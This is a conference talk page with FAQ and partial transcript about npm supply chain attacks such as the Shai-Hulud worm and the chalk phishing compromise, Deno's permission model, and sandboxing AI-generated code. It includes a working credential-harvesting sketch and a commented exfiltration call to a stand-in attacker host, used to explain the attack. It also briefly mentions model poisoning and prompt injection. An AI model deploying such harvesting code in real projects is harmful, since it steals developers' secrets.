npm install && pray


We all know the ritual: add a dependency, trust it implicitly, ship it to production. For years, that worked well enough. But now the attacks have started getting smarter.

Supply chain attacks targeting the npm ecosystem aren't theoretical anymore. Malicious packages that steal credentials, hijack environment variables or silently exfiltrate data over HTTP are showing up in minor version bumps. The JavaScript ecosystem's greatest strength, its openness, has become its greatest liability.

And then we handed our keyboards to AI.

AI assistants are, of course, useful. But they introduce a new category of risk: code you didn't write, don't fully understand, and may never review closely enough. Models can leak API keys into generated output, AI-written code can accidentally delete files or make unintended network calls, or worse. And if someone has poisoned the training data, your AI might do these things on purpose.

In this talk, we'll walk through real examples of threat vectors, demonstrate how Deno's permission system can stop a supply chain attack in its tracks, and explore how sandboxing your code execution can give you a genuinely safe environment to run AI-generated code without the overhead of standing up Docker infrastructure.

You'll leave with a clearer picture of the threat landscape and practical tools to execute code you might not trust.

This talk was presented at Node Congress 2026.

FAQ

Supply chain attacks in the npm ecosystem occur when malicious actors compromise trusted packages. They exploit implicit trust in version ranges and can attack maintainers via phishing to gain publishing rights, injecting malware into popular packages.

Shai-Hulud was a self-replicating worm that compromised over 500 npm packages by stealing credentials and publishing malicious versions of packages. A second wave, Shai-Hulud 2.0, compromised 796 more packages, affecting over 20 million weekly downloads.

Deno's permission system requires explicit permissions for accessing sensitive APIs, unlike Node.js, which grants permissions by default. Deno can restrict environment variable access, internet access, and file system operations to enhance security.
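For example, Deno's opt-in model shows up directly in its CLI flags. A minimal sketch, assuming a hypothetical `script.ts` and illustrative host and directory names:

```shell
# With no flags, the script runs with zero permissions: any attempt to
# read env vars, files, or the network throws a PermissionDenied error.
deno run script.ts

# Grant only what the script actually needs.
deno run --allow-net=api.example.com --allow-read=./data script.ts

# Deny environment access explicitly, even alongside broader grants.
deno run --allow-net --deny-env script.ts
```

By contrast, a Node.js script gets full access to the file system, network, and environment by default.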

Docker provides containerized isolation for running AI-generated code, but requires setup. Deno's permissions offer a simpler alternative by restricting access to sensitive operations. Both methods aim to prevent unauthorized access and data loss.

Deno's sandbox feature uses micro VM-based sandboxes for executing code in complete isolation. This ensures separate file systems, network namespaces, and limits access to sensitive data, protecting against potential security risks from untrusted code.

AI coding assistants can inadvertently suggest insecure coding patterns, expose API keys, and execute unintended actions. They could potentially be manipulated through prompt injection attacks to compromise security.

Developers can use Deno's secrets option, which replaces sensitive information with placeholders. Secrets are only revealed during approved API calls, preventing unauthorized access or exfiltration by untrusted code.
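The idea behind secret placeholders can be sketched generically in plain JavaScript. This is an illustration of the pattern, not Deno's actual secrets API; all names here are hypothetical:

```javascript
// Placeholder pattern sketch: untrusted code only ever sees an opaque
// placeholder string; the real value is substituted by trusted glue
// code at the approved call site.
const vault = new Map();

function registerSecret(name, value) {
  const placeholder = `__SECRET_${name}__`;
  vault.set(placeholder, value);
  return placeholder;
}

// Trusted boundary: swap placeholders for real values just before use.
function resolveSecrets(text) {
  let out = text;
  for (const [placeholder, value] of vault) {
    out = out.replaceAll(placeholder, value);
  }
  return out;
}

const key = registerSecret("OPENAI_API_KEY", "sk-real-value");
// Untrusted code builds a header with the placeholder only...
const header = `Bearer ${key}`;
// ...so it cannot read or exfiltrate the real value; trusted code
// resolves it at the edge, right before the approved API call.
console.log(resolveSecrets(header)); // "Bearer sk-real-value"
```

The untrusted side can pass the placeholder around freely, but logging or exfiltrating it reveals nothing useful.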

Model poisoning involves injecting malicious data into AI training datasets, potentially backdooring models to behave maliciously under specific conditions. This poses significant security risks as the compromised models can act unpredictably.

AI-generated code should be treated as untrusted because it may contain errors or unintended behaviors. Running it in isolation and reviewing it thoroughly helps prevent potential security vulnerabilities or data loss.

The Chalk attack involved attackers registering a fake domain, npmjs.help, and sending a phishing email to a maintainer to steal credentials. This allowed them to hijack cryptocurrency transactions by injecting code into popular npm packages.

Jo Franchetti
29 min
26 Mar, 2026

Video Summary and Transcription
JavaScript developers face security risks from npm packages, with self-replicating worms compromising hundreds of them. Supply chain attacks target prolific maintainers, leading to unauthorized code injection. Implicit trust in version ranges and vulnerable maintainers are what make these attacks succeed. Secure package installation practices differ between npm and Deno. AI-generated code introduces new security risks, including embedded secrets. Secure AI code execution relies on sandboxing for isolation and careful handling of API keys.

1. Security Risks of NPM Packages

Short description:

JavaScript developers trust npm packages for functionality, but a new threat emerged in 2025. A self-replicating worm, Shai-Hulud, compromised over 500 npm packages by stealing credentials and publishing malicious versions. A second wave, Shai-Hulud 2.0, targeted 796 more packages, impacting millions of weekly downloads.

Hello, Node Congress. Thank you so much for having me. I'm Jo Franchetti and I'm a DevRel at Deno, and I'm going to dive right in and let's talk about some scary stuff.

There's a ritual that every JavaScript developer knows. You're building something, you need to parse dates or validate an email or format a currency. So you do what any reasonable person does. You open up your terminal and you type npm install, and you pick a package with a few million weekly downloads and a friendly readme. You trust it. You ship it.

And for a long time, that worked great. Our ecosystem grew because of that trust, because someone could publish a utility at 2 a.m. and by morning developers on the other side of the world were already using it in production. And that openness is genuinely beautiful. It's why JavaScript became what it is. But we need to talk about what that trust costs us now.

In September of 2025, researchers at ReversingLabs identified something that hadn't been seen before in the npm ecosystem. It was a self-replicating worm, and they called it Shai-Hulud, after the sandworm from Dune, which is pretty fitting because once it got into the ecosystem, it was very hard to stop. And here's what it did. It started with a single malicious package, in this case rxnt-authentication. Once a developer installed it, the malware would scan their environment for npm credentials. Then it used those credentials to publish malicious versions of other packages that that developer maintained or had access to. It was literally viral.

Each new victim became a new vector for attack. By the time it was contained, over 500 npm packages had been compromised. Then there was a second wave, Shai-Hulud 2.0, which hit in November and compromised 796 more packages, representing over 20 million weekly downloads. And what was the malware actually stealing? Anything it could find. It was looking for environment variables, AWS and GCP tokens, GitHub credentials, npm auth tokens. And it did all of this silently over HTTP in the background while your app ran perfectly.
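To see why this kind of credential theft is so easy, here is a deliberately defanged sketch of the harvesting step described above. The variable-name patterns are illustrative, and the exfiltration step is shown only as a comment:

```javascript
// Sketch of what a malicious install script can do: scan the
// environment for credential-shaped variables. An install hook runs
// with the developer's full privileges, so process.env is wide open.
const SENSITIVE = [/^AWS_/, /^GCP_/, /TOKEN/i, /^GITHUB_/, /^NPM_/];

function harvest(env) {
  const stolen = {};
  for (const [key, value] of Object.entries(env)) {
    if (SENSITIVE.some((re) => re.test(key))) stolen[key] = value;
  }
  return stolen;
}

// A real worm would now POST the result to an attacker-controlled
// host, silently, while the app keeps working:
// fetch("https://attacker.example/collect", {
//   method: "POST",
//   body: JSON.stringify(harvest(process.env)),
// });
console.log(Object.keys(harvest({
  AWS_ACCESS_KEY_ID: "AKIA...",
  PATH: "/usr/bin",
  NPM_TOKEN: "npm_...",
}))); // [ 'AWS_ACCESS_KEY_ID', 'NPM_TOKEN' ]
```

Nothing here requires an exploit; the attack is just ordinary code running with the permissions Node grants every script by default.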

2. Supply Chain Attacks in NPM Ecosystem

Short description:

A supply chain attack in the npm ecosystem targeted a prolific maintainer, compromising 18 packages with over 2 billion weekly downloads. Attackers used a phishing email to obtain credentials, leading to unauthorized updates injecting code for hijacking cryptocurrency transactions. Implicit trust in version ranges and human vulnerabilities contribute to the success of such attacks.

You would never know. And a month earlier, in September 2025, a different attack hit even harder. You've maybe heard of the chalk or debug packages, two of the most downloaded packages in the entire npm ecosystem. And a very prolific maintainer managed both of these along with 16 other widely used packages. Combined, they had more than 2 billion weekly downloads.

What the attackers did is they registered the domain npmjs.help. And then three days after registering it, they sent the maintainer an email from support at npmjs.help. And they were impersonating npm support. The email was convincing enough to get the maintainer to enter their credentials into a fake login page. And with those credentials, the attackers then had full publishing rights to all 18 of their packages.

So let's take a moment to understand the mechanics, because that's important for what we're going to talk about next. Supply chain attacks in the npm ecosystem work because of a combination of factors. First is implicit trust in version ranges. We all do it. Most of our package.json files use a caret or a tilde in front of the version numbers. That means that when a maintainer pushes, say, 2.1.1 to fix a bug, your CI is going to automatically pull it in. There's no review. You don't get any approval. It just lands in production.
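As a concrete illustration, a single package.json can mix auto-updating ranges with exact pins (the package names and versions below are illustrative):

```json
{
  "dependencies": {
    "left-pad": "^1.3.0",
    "chalk": "~5.3.0",
    "debug": "4.3.4"
  }
}
```

The caret range `^1.3.0` accepts any 1.x.x at or above 1.3.0, the tilde range `~5.3.0` accepts only 5.3.x patch releases, and the bare `4.3.4` pins the exact version, so a malicious 4.3.5 would never be pulled in automatically. Pinning alone isn't a complete defense, but it removes the "no review, no approval" path described above.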

